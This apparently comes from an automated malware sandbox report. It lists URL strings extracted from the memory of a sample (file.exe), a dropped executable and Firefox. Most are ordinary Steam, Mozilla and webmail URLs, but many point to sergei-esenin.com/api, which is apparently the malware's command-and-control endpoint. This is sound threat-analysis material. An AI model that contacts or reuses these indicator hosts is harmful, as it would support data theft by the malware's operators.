Source: file.exe, 00000000.00000003.1417736971.0000000001172000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815032604.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812396686.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=qYlgdgWOD4Ng&amp
Source: file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/s
Source: file.exe, 00000000.00000003.1573522548.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573333349.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/sh
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: file.exe, 00000000.00000003.1417659219.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812498716.0000000000ADE000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1983432010.000000000117B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: 8138ba21a1.exe, 00000012.00000003.2180590726.0000000001175000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/cssvsT
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: firefox.exe, 0000001D.00000002.2138617954.000001C96409F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2141978410.000001C964321000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001D.00000002.2122168164.000001C9572D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 0000001D.00000002.2130386877.000001C9634DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACB5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: firefox.exe, 0000001D.00000002.2128083032.000001C96307D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001D.00000003.1989649601.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996647465.000001C964733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2143043108.000001C964738000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1996003355.000001C96471D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s4
Source: firefox.exe, 0000001D.00000002.2125679679.000001C962A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 0000001D.00000002.2192132128.000001C9687D5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptNaT
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 0000001D.00000002.2130386877.000001C963473000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2264780674.000001C96AB78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: 8138ba21a1.exe, 0000000A.00000003.1812286819.0000000000AD6000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000002.1815153546.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812465296.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 0000000A.00000003.1812336611.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001D.00000002.2267577999.000001C96ACA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 0000001D.00000002.2126645860.000001C962BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C963403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 0000001D.00000003.1985500280.000001C966F60000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1984524321.000001C966F21000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985862608.000001C966F7F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2227705741.000001C968E1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.1985118386.000001C966F40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2130386877.000001C96347B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 0000001D.00000003.2074345700.000001C968996000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459054551.0000000005986000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1431328148.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1984181714.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067087798.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067414853.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2095726575.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181105344.0000000001119000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.1417736971.00000000011AF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/$l
Source: 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/.
Source: 8138ba21a1.exe, 00000012.00000003.2067087798.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2067414853.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com//
Source: 8138ba21a1.exe, 00000012.00000003.1998433341.0000000001193000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.1998252490.0000000001187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/3
Source: 8138ba21a1.exe, 00000012.00000003.2047135073.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2049269933.00000000011B4000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2041871349.00000000011AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/7
Source: file.exe, 00000000.00000003.1458782444.0000000005982000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/9
Source: 8138ba21a1.exe, 00000012.00000003.2116513162.00000000011B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/?
Source: file.exe, 00000000.00000003.1493028157.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487828649.00000000011F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/F
Source: 8138ba21a1.exe, 00000012.00000003.2067645596.00000000059AA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/II
Source: 8138ba21a1.exe, 00000012.00000003.2117059192.000000000119E000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2180479528.0000000001192000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2043446372.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2021461230.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2116663478.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2095825871.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117509341.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2117059192.0000000001191000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047304849.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2096131872.00000000011A0000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2042228537.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: 8138ba21a1.exe, 00000012.00000003.1998252490.0000000001187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api((
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api1
Source: file.exe, 00000000.00000003.1445624712.0000000005985000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api5UP3P
Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1458847673.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1459122490.0000000005990000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1477815226.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1460412273.0000000005991000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api8P
Source: file.exe, 00000000.00000003.1474136490.000000000598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiD3l
Source: 8138ba21a1.exe, 00000012.00000003.2043446372.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2047304849.00000000059AD000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2066736978.00000000059AA000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2042228537.00000000059AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiKAa
Source: file.exe, 00000000.00000003.1487793177.000000000598F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1487656293.000000000598F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiP3P
Source: 8138ba21a1.exe, 00000012.00000003.2180388586.0000000001198000.00000004.00000020.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2181693561.00000000011A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiZ
